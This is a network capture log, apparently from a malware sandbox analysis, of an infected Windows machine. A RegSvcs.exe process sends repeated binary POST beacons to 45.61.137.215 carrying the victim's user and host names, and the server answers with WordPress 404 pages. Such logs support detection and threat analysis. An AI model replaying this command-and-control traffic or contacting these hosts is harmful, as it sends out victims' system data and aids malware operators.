May 29, 2024 15:42:47.378268003 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:42:47.378283024 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:42:47.378297091 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 29, 2024 15:42:47.378313065 CEST	896	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 29, 2024 15:42:47.378329039 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:42:47.378384113 CEST	224	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
May 29, 2024 15:42:47.378400087 CEST	1236	IN	Data Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
May 29, 2024 15:42:47.378415108 CEST	224	IN	Data Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-
May 29, 2024 15:42:47.378711939 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.9	49727	216.40.34.41	80	3504	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:42:46.507601976 CEST	169	OUT	GET /dn03/?KvOx3=URhw1ZwvIctTGCpPzcTqZFryLoAICCIR37RdTq+D27m0Ed9BTUTA8R/QfR+xv6khW63w&LhEx=ODKXZDVpY2w8gpmp HTTP/1.1 Host: www.imdcaam.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.9	49728	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:42:47.538290977 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:42:47.543272018 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:42:50.098850965 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:42:48 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:42:50.098864079 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:42:50.098875999 CEST	448	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:42:50.099153996 CEST	1236	IN	Data Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
May 29, 2024 15:42:50.099164009 CEST	1236	IN	Data Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
May 29, 2024 15:42:50.099183083 CEST	448	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77 Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
May 29, 2024 15:42:50.099195004 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:42:50.099205971 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 29, 2024 15:42:50.099216938 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 29, 2024 15:42:50.099773884 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.9	49729	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:42:50.288079023 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:42:50.293190002 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:42:52.763564110 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:42:50 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:42:52.763597012 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:42:52.763607979 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:42:52.763617992 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 29, 2024 15:42:52.763628960 CEST	896	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 29, 2024 15:42:52.764004946 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:42:52.764122963 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 29, 2024 15:42:52.764133930 CEST	1236	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 29, 2024 15:42:52.764144897 CEST	1236	IN	Data Raw: 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b Data Ascii: ar(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important
May 29, 2024 15:42:52.764159918 CEST	1236	IN	Data Raw: 61 63 6b 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 Data Ascii: ack-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--w

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.9	49730	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:42:52.927475929 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:42:52.932425976 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:42:55.411243916 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:42:53 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 